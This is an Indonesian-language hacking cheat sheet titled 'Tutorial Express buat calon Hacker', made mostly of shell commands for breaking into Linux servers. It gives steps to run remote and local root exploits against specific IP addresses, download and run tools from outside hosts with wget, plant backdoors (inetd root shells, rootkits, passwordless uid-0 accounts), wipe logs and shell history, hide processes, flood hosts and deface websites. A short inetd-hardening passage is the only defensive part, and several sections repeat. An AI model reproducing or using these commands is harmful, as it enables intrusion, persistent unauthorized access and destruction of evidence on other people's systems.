Title : Tutorial Express buat calon Hacker
Author : Si Legot
1. ***Compile File***
gcc -o file file.c
2. ***Jalanin wuftpd-god.c***
./filewuftpd-god -t IPtarget -s0
3. ***Jalanin statdx.c ***
./filestatdx -t IPtarget -d0
4. ***Jalanin 7350wu***
./7350wu -r -h IPtarget
5. ***Compile BnC : (BnC2.2.4)***
gcc -o file bnc.c
export TERM=vt100 (2x)
pico bnc.conf
./file
6. ***Root Wipe***
cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
---------------------------------------------------------
cd /
rm -f /root/.bash_history
touch /root/.bash_history
chmod 0 /root/.bash_history
ls -laF /root/.bash_history
chmod 0 /var/log/*
---------------------------------------------------------
7. ***kalo udah masuk root***
cari user postgres atawa gdm
or ketik
a. finger gdm or finger postgres
b. passwd postgres atau passwd gdm
c. mkdir /usr/man/gdm or postgres
d. chown gdm or postgres /usr/man/gdm or postgres
kalo gak ada u bikin user atas nama gdm atawa postgres
cd /usr/sbin
./adduser -d /usr/man/gdm or postgres
ulangi ku sia langkah point 4
---------------------------------------------------------
8. ***Adduser***
cd /usr/sbin
./adduser -d /etc/
chown /etc/
passwd
* untuk mode BINARY Exec File or *gz *.rpm
***Download (Shell to Shell)
ftp shell tujuan
bin
hash
mget file
***Upload (Shell to Shell)
ftp shell tujuan
bin
hash
mput file
* untuk mode ASCII / txt , html , *.c
***Download (Shell to Shell)*** Mode Binary
ftp shell tujuan
hash
mget file
***Upload (Shell to Shell)
ftp shell tujuan
hash
mput file
9. ***IP Shell***
/sbin/ifconfig
***Copy File***
cp file /direktory-tujuan
10. ***Login Root (Term)***
adduser
upload file : term.sh/term2.sh, statd.rpm & wuftpd.rpm ---> ke user
chmod +x term.sh
./term.sh
masukkin pass(buat vt-nya)
bersihin Log
exit
11. ***Cek New Term***
export TERM=pass (2x biar clear)
telnet Ip target
(kalo masuk : that's good job !!!)
pico log.sh
chmod +x log.sh
./log.sh
12. ***Patch Term***
rpm -Uvh statd.rpm
rpm -Uvh wuftpd.rpm
13. ***Hide BG procces***
gcc -o namafile undo1.c
chmod +x namafile
./undo httpd ./eggdrop -m eggdrop.conf
14. ***Jalanin z0ne***
chmod +x z0ne
./z0ne -o hostname >> file-hostname.log &
ex : ./z0ne -o net.id >> net-id.log &
15. ***Jalanin wuscan***
compile wuscan.c
./wuscan filez0ne.log &
hasilnya : wu-scan.log
cat wu-scan.log (buat baca hasilnya)
16. ***Re-Hack (login user masih ada)***
upload mount.c
compile mount.c
chmod +x file-mount
./file-mount
su root
term ulang
17. ***Wipe Login User***
(ngejalaninnya pake login Root)
upload wipe ke dir-user
chmod +x wipe
./wipe u username
./wipe l username
./wipe w username
18. ***Rlogin***
rlogin -l usernukusiadijiuen ip
***Buka Port Telnet Baru***
echo telnet 11210/tcp Telnet telnet 11210/udp Telnet >> /etc/services
echo 11210 stream tcp nowait root /usr/sbin/tcpd in.telnetd >> /etc/inetd.conf
killall -HUP inetd
atau :
echo "ntp 16032908/tcp" >> /etc/services
echo "ntp stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf
echo "16030 stream tcp nowait root /usr/sbin/tcpd in.telnetd" >> /etc/inetd.conf
killall -HUP inetd
19. ***Jalanin Tembak.c***
./fake bash ./tembak zipey.net 53 (Pake Hidder tanpa Login Root)
./tembak ipaddress 53 atau ./tembak zipey.com 53
./tembak zipey.com 53 -->> artinya nembak zipey.com lewat port 53
(ditembak port 53 nya pasti mati)
./fake proses_asli proses_paslu
./fake httpd ./teso -h 202.202.202.202
./fake -bash ./bnc bnc.conf
./fake pico ./eggdrop -m FroGStoNe
========================================
********ping flood*********
ping -qfl 65510 -s 1000 (IP)
stop : ctrl C
========================================
cat /etc/passwd/
==============================================================================
*********buka FTP**********
echo ftp 11210/tcp Ftp ftp 11210/udp Ftp >> /etc/services
echo 11210 stream tcp nowait root /usr/sbin/tcpd in.ftpd >> /etc/inetd.conf
killall -HUP inetd
==============================================================================
#################################################################################################
# Inetd, atau disebut sebagai 'super server' akan meload program network sesuai dengan #
# permintaan dari network. File 'Inetd.conf' akan memberitahu inetd untuk listen pada port #
# yang telah ditentukan dan server apa yang akan dijalankan pada tiap port-port yang ada. #
# Hal ini pertama yang harus diperhatikan setelah kita meletakkan server dalam jaringan servis #
# apa yang harus kita sediakan dan servis apa yg dihilangkan. #
# Servis yg tidak diperlukan dianjurkan untuk ditutup dan diuninstall untuk lebih mengurangi #
# kekawatiran serangan pada server. #
# Posted by sisHACK crew | www.sisHACK.org | Bahan acuan Linux Redhat Server ( Han Lin ) #
#################################################################################################
Servis yang tidak diperlukan dapat ditiadakan dengan meletakkan tanda '#' awal baris dari servis
yang tidak diperlukan, setelah itu kita dapat merestart '/etc/inetd.conf' dengan mengirim signal
SIGHUP ke proses inetd.
Ok, kita masuk ke langkah-langkah sebenarnya :
1. ubah permision '/etc/inetd.conf' ke 600
[root@sishack.org /]# chmod 600 /etc/inetd.conf
2. Periksa keterangan pemilik file '/etc/inetd.conf', pastikan bahwa pemilik file tersebut adalah
root.
[root@sishack.org /]# stat /etc/inetd.conf
3. Edit file '/etc/inetd.conf' dan tiadakan servis seperti FTP, telnet, shell, login, exec, talk
ntalk, imap, pop-2, pop-3, finger, auth, etc kecuali anda mempunyai rencana untuk menggunakan
servis tersebut.
Setelah selesai mengedit file '/etc/inetd.conf' maka jangan lupa untuk mengirim signal SIGHUP
ke proses inetd
[root@sishack.org /]# killall -HUP inetd
4. Setelah mengedit file '/etc.inetd.conf' maka langkah terakhir yang mungkin berguna untuk
dilakukan adalah mengeset atribut 'immutable' dengan menggunakan perintah :
[root@sishack.org /]# chattr +i /etc/inetd.conf
hal ini akan mencegah perubahan baik sengaja maupun tidak sengaja terhadap file '/etc/inetd.conf
untuk menghilangkan atribut 'immutable' menggunakan perintah :
[root@sishack.org /]# chattr -i /etc/inetd.conf
: TRIK BIKIN PSYBNC :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd var/tmp/ ; mkdir .... ; cd .... ;
wget http://phaty.org/psyBNC2.2.1-linux-i86-static.tar.gz ;
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make ; mv psybnc "bash " ; rm psybnc.conf ;
wget http://phaty.org/Psybnc.txt ; mv Psybnc.txt psybnc.txt ; mv psybnc.txt " " ; pwd ; PATH=$PATH:/var/tmp/..../.log/ ; "bash " " "
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ; find |grep psybnc
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd var/tmp/ ; mkdir " " ; cd " " ;
wget http://phaty.org/psyBNC2.2.1-linux-i86-static.tar.gz ;
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make ; mv psybnc "httpd " ; rm psybnc.conf ;
wget http://www.geocities.com/rush_cassidy/psybnc.txt ; mv psybnc.txt " " ; pwd ;
PATH=$PATH:/var/tmp/" "/.log/ ; "httpd " " "
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ; find | grep psybnc
=================================================================================================
: TRIK MENGHAPUS LOG :
=================================================================================================
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
: LOCAL ROOT MANDRAKE :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir " " ; cd " "
1. wget www.norifumiya.org/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7. mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd phaty -g wheel -s /bin/bash -d /home/.phaty
12. echo "geni::0:0::/.geni:/bin/bash" >> /etc/passwd
passwd -d phaty
Changing password for user phaty
Removing password for user phaty
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14. last |grep phaty
15. su geni
16. wget http//phaty.org/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/phaty
19. wget utay-doyan.cc/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup koped123 7788
23. /usr/sbin/userdel -r phaty
24. cd /var/tmp/" " <== Bersihkan semua tools
25. Test shell dengan port 7788, login as : root, password : koped123
=================================================================================================
1. ./telnetsol -u root -p 23 -h 202.175.81.40
2. ./logwatchrh72.sh (kalo keluar permision denied)
chmod +x logwatchrh72.sh
sh logwatchrh72.sh
3. wget http://www.anaknaga.com/silverfuck/pl ; chmod +x pl ; ./pl
4. wget http://www.tuhanonline.com/lx ; chmod +x lx ; ./lx
5. wget http://cupu.saintz.cx/tools/dhegleng/local/yim ; chmod 755 yim ; ./yim
=================================================================================================
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "Bedjoe Oemar Said Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo "Bedjoe Oemar Said Was Here" > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
=================================================================================================
BACKDOOR
=================================================================================================
wget http://xvak-1.150m.com/tool/tk8.tgz
wget http://xvak-1.150m.com/tool/bk2.tar.gz
wget utay-doyan.cc/shv4.tar.gz
wget www.radikal.org/backdoor.tar.gz
=================================================================================================
nmap -sS -p 80 -O -v
nmap -sS -F -o transmeta.log -v -O www.transmeta.com//24
=================================================================================================
COMMAND ADDUSER DI FREEBSD
=================================================================================================
1. pw useradd -g whell -d /home/bedjo -s /usr/local/bin/tcsh, 2. passwd bedjo
bisa juga dengan : 1. pw useradd bedjo, untuk mengganti user dan password : 1. pw usermod erica -l bedjo, 2. passwd bedjo
=================================================================================================
BIKIN BACKDOOR
=================================================================================================
echo "bedjo 1979/tcp" >> /etc/services
echo "dial stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf kill -HUP 135
telnet dengan port "1979"
=================================================================================================
http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
http://www.rocketpunch-ent.com/lucstatdx.c
=================================================================================================
[root@gila /]#rpm -qa | grep samba
samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36
[root@gila /]# arp -n
Address HWtype HWaddress Flags Mask Iface
192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1
192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1
192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1
192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1
192.168.0.3 ether 00:10:5A:71:17:E3 C eth1
192.168.0.1 ether 00:00:21:28:8C:47 C eth1
[root@gila /]# nmblookup -d2 '*' #untuk mendeteksi netbios
Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )
[root@gila /]# locate findsmb
/usr/bin/findsmb
[root@router /]# findsmb
IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
-----------------------------------------
192.168.0.1 CYBER1 [CYBER]
192.168.0.2 CYBER2 [CYBER]
192.168.0.3 CYBER3 [CYBER]
192.168.0.4 CYBER4 [CYBER]
192.168.0.5 CYBER5 [CYBER]
[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
Sharename Type Comment
--------- ---- -------
A Disk
C Disk
D Disk
E Disk
IPC$ IPC Remote Inter Process Communication
[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/
[root@router samba]# ls
ffastun.ffa ffastun.ffo install RECYCLED
ffastun0.ffx ffastun.ffl film win98
[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
=================================================================================================
bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
=================================================================================================
gcc sco-pop.c -o sco-pop
./sco-pop www.target.com
/var/adm
=================================================================================================
: BERSIHKAN LOG :
=================================================================================================
ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
=================================================================================================
securityfocus.com|rstcorp.com/its4|striker.ottawa.on.ca/~aland/pscan|securiteam.com|www.l0pht.com|insecure.org|rhino9.ml.org|technotronic.com|nmrc.org|cultdeadcow.com|kevinmitnick.com|2600.com|antionline.com|rootshell.com|aol.com|happyhacker.org|lwn.net|slashdot.org|netric.org
=================================================================================================
repsec.com|iss.net|checkpoint.com|infowar.com|
=================================================================================================
li.org|redhat.com|debian.org|linux.org|www.sgi.com|netbsd.org|openbsd.org|linuxtoday.com|freebsd.org|slackware.com|mandrake.com|linuxguruz.org
=================================================================================================
harvard.edu|yale.edu|caltech.edu|stanford.edu|mit.edu|berkeley.edu|oxford.edu|whitehouse.gov|sunsite.unc.edu|
=================================================================================================
http://channels.dal.net/netgate/psybnc2.3.tar.gz|geocities.com/logic_roncep|irc.netsplit.de/networks/DALnet/current.var|psychoid.lam3rz.de/psyBNC2.3.tar.gz|shellcentral.com/downloads/files/psyBNC2.3.1.tar.gz|seputarmalang.com/kayutangan.php|community.core-sdi.com/~juliano|packetstormsecurity.org/0212-exploits/telnetjuarez.c|packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz|maskedteam.com/exploit/local.tar.gz|http://ftp.linux.hr/pub/openssh/openssh-2.1.1p4.tar.gz|wget http://www.pupet.net/fiona/sslpupet.tar.gz|
=================================================================================================
1. wget www.norifumiya.org/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
./ssl 204.145.119.253
=================================================================================================
1. wget www.juventini-suka.cc/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
=================================================================================================
1. wget http://www.buglifeo.org/_Ddos_/vadim.c
2. gcc -o vadim vadim.c
3. ./vadim 202.152.156.189 53 202.152.156.189
=================================================================================================
1. wget http://packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
./openssl-too-open -a 0x15 -v 212.70.224.129
=================================================================================================
1. wget http://cupu.saintz.cx/tools/Baboon/B-BackdoorAsUser/bindshell
2. chmod +x bindshell
3. ./bindshell
4. /run telnet 4000 <-- ketik command ini di mirc dikau
/run telnet 203.130.251.91 4000
=================================================================================================
1. wget www.cahcepu.net/dhegleng/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
./setup 7788 35b4tu
=================================================================================================
1. wget http://www.anaknaga.com/silverfuck/pl
2. chmod +x pl
3. ./pl
=================================================================================================
1. wget http://www.cahcepu.net/dhegleng/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
./massplo 210.10 -d 8
=================================================================================================
1. wget www.cahcepu.net/dhegleng/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4. ./apache 208.134.131.49
./massossl 80 443 13
./mapache 443 210.10
=================================================================================================
1. wget http://geocities.com/ondelid/kaka.tar.gz
2. tar zvxf kaka.tar.gz
3. rm kaka.tar.gz ;
4. mv kaka " " ;
5. cd " "
6. PATH=$PATH:/tmp/" "
7. ./kik "adhe" ./psybnc
=================================================================================================
1. wget http://itil.issexy.tv/lx
2. chmod +x lx
3. ./lx
=================================================================================================
1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
=================================================================================================
1. wget http://packetstormsecurity.nl/exploits/OpenFuckV2.c
2. gcc -o Open OpenFuckV2.c -lcrypto
3. ./Open Target IP
./Open 0x08 196.33.3.4
=================================================================================================
1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning
./sambal -d 0 -C 60 -S IP | grep samba
./sambal -b 0 IP <=== attack
=================================================================================================
=================================================================================================
SecureCRT: http://www.vandyke.com/
TTSSH: http://www.zip.com.au/~roca/ttssh.html
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html
SecureShell: http://public.srce.hr/~cigaly/ssh/
=================================================================================================
=================================================================================================
Install WGET
=================================================================================================
1. coba ketik: cat /etc/issue, untuk melihat Sistem Operasinya
2. ketik: ftp ftp.rpmfind.net
3. login : anonymous
4. cd linux/redhat/updates/7.0/en/os/
5. cd i386
6. get wget-1.8.2-4.70.i386.rpm
7. quit dari ftp
8. Proses Peng-Instalan
rpm -ivh wget-1.8.2-4.70.i386.rpm
http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+...&system=redhat&arch=
=================================================================================================
wget http://202.158.16.157/ssh.diff
wget http://www.lukyluke.dk/unix/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.5p1.tar.gz
cp ssh.diff openssh-3.5p1.tar.gz
cd openssh-3.5p1
patch -p < ssh.diff
./configure
make ssh
./ssh -l root
./ssh -l root 66.136.37.101
./ssh -l root 66.149.178.214
=================================================================================================
: COMMAND ADDUSER :
=================================================================================================
/usr/sbin/useradd phaty -g wheel -s /bin/bash -d /etc/phaty
/usr/sbin/useradd geni -u 0 -d /
passwd -d phaty
Changing password for user phaty
Removing password for user phaty
passwd: Success
passwd -d geni
Changing password for user geni
Removing password for user geni
passwd: Success
=================================================================================================
passwd phaty
New UNIX password: lonthe123
Retype new UNIX password: lonthe123
Changing password for user phaty
passwd: all authentication tokens updated successfully
password geni
New UNIX password: koped123
Retype new UNIX password: koped123
Changing password for user geni
passwd: all authentication tokens updated successfully
=================================================================================================
OPENSSL-TOO-OPEN
=================================================================================================
./openssl -a 0x15 -v 61.220.53.91
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse
: Opening 30 connections
Establishing SSL connections
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0x80e1638
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0x80e1638 start_addr: 0x80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
=================================================================================================
: MARI KITA MAINKAN ROOTNYA :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir ... ; cd ....
wget www.norifumiya.org/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1
GOT IT! Your magic number is : 792
Now create a dir 'segfault.eng' and touch a file named 'segfault.eng' in it.
Then exec "./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792" to get rootshell
*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1
Good Luck d0inks!
mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
=================================================================================================
/usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo "apache::0:0::/mails:/bin/bash" >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
login ke shell
last |grep mails
su apache
mkdir /var/tmp/" "
cd /var/tmp/" "
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/" " <== del semua tools
test shell with port 7788 and password 35b4tud1n91n
=================================================================================================
[Langkah Hapus Log I]
=================================================================================================
export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0
=================================================================================================
[Langkah Hapus Log I]
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
wget http://brutalside.host.sk/tools/term
chmod +x term
./term lonthe123
=================================================================================================
wget http://brutalside.host.sk/tools/ftp.tgz
gunzip ftp.tgz
gzip ftp.tar
tar -zxvf ftp.tar.gz
cd ftp
./scan 163 22 10
./scan 163 22 10 163
=================================================================================================
scan port dgn pscan.c ==> www.packetstormsecurity.nl
bila port:23 vurnerable bisa running exploit
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
=================================================================================================
http://brutalside.host.sk/tools/kik
chmod +x kik
./kik "-bash" ./psybnc
=================================================================================================
=================================================================================================
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
=================================================================================================
Hacking adalah kesungguhan untuk belajar, Hacking adalah "diam" tapi otaknya bekerja, Hacking adalah sebuah proses kebebasan. Seorang hacker adalah seseorang yang ingin mengerti sebuah sistem, mengetahui bagaimana sang sistem bereaksi, bersenang-senang mengambil alih kekuasaan di server tersebut dan tertarik dalam menemukan bugs-bugs. [Kata Mbah scut]
=================================================================================================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Sampai disini kita selesai dengan permainan di server target root
Sekarang kita kembali ke user dan ketik :
./sh
nah, apa yg terjadi setelah kita jalankan command ./sh...?
yg terjadi adalah uid dan gid kita adalah 0 :)
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
./psybnc psybnc.conf
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc "syslogd "
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
mv psybnc.conf " " ; pwd
PATH=$PATH:/var/tmp/" "/.log/
"syslogd " " "
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
=================================================================================================
: TRIK BIKIN PSYBNC :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd var/tmp/ ; mkdir .... ; cd .... ;
wget http://phaty.org/psyBNC2.2.1-linux-i86-static.tar.gz ;
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make ; mv psybnc "bash " ; rm psybnc.conf ;
wget http://phaty.org/Psybnc.txt ; mv Psybnc.txt psybnc.txt ; mv psybnc.txt " " ; pwd ; PATH=$PATH:/var/tmp/..../.log/ ; "bash " " "
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ; find |grep psybnc
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd var/tmp/ ; mkdir " " ; cd " " ;
wget http://phaty.org/psyBNC2.2.1-linux-i86-static.tar.gz ;
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make ; mv psybnc "httpd " ; rm psybnc.conf ;
wget http://www.geocities.com/rush_cassidy/psybnc.txt ; mv psybnc.txt " " ; pwd ;
PATH=$PATH:/var/tmp/" "/.log/ ; "httpd " " "
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ; find | grep psybnc
=================================================================================================
: MEMBERSIHKAN LOG :
=================================================================================================
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
=================================================================================================
: LOCAL ROOT MANDRAKE :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir " " ; cd " "
1. wget www.norifumiya.org/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7. mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd phaty -g wheel -s /bin/bash -d /home/phaty
12. echo "geni::0:0::/.geni:/bin/bash" >> /etc/passwd
passwd -d phaty
Changing password for user phaty
Removing password for user phaty
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14. last |grep phaty
15. su geni
16. wget http//phaty.org/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/phaty
19. wget utay-doyan.cc/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup koped123 7788
23. /usr/sbin/userdel -r phaty
24. cd /var/tmp/" " <== Bersihkan semua tools
25. Test shell dengan port 7788, login as : root, password : koped123
=================================================================================================
1. ./telnetsol -u root -p 23 -h 202.175.81.40
2. ./logwatchrh72.sh (kalo keluar permision denied)
chmod +x logwatchrh72.sh
sh logwatchrh72.sh
3. wget http://www.anaknaga.com/silverfuck/pl ; chmod +x pl ; ./pl
4. wget http://www.tuhanonline.com/lx ; chmod +x lx ; ./lx
5. wget http://cupu.saintz.cx/tools/dhegleng/local/yim ; chmod 755 yim ; ./yim
=================================================================================================
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "Bedjoe Oemar Said Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.htm mnc.htm
echo "Bedjoe Oemar Said Was Here" > index.shtml
untuk mentesnya :
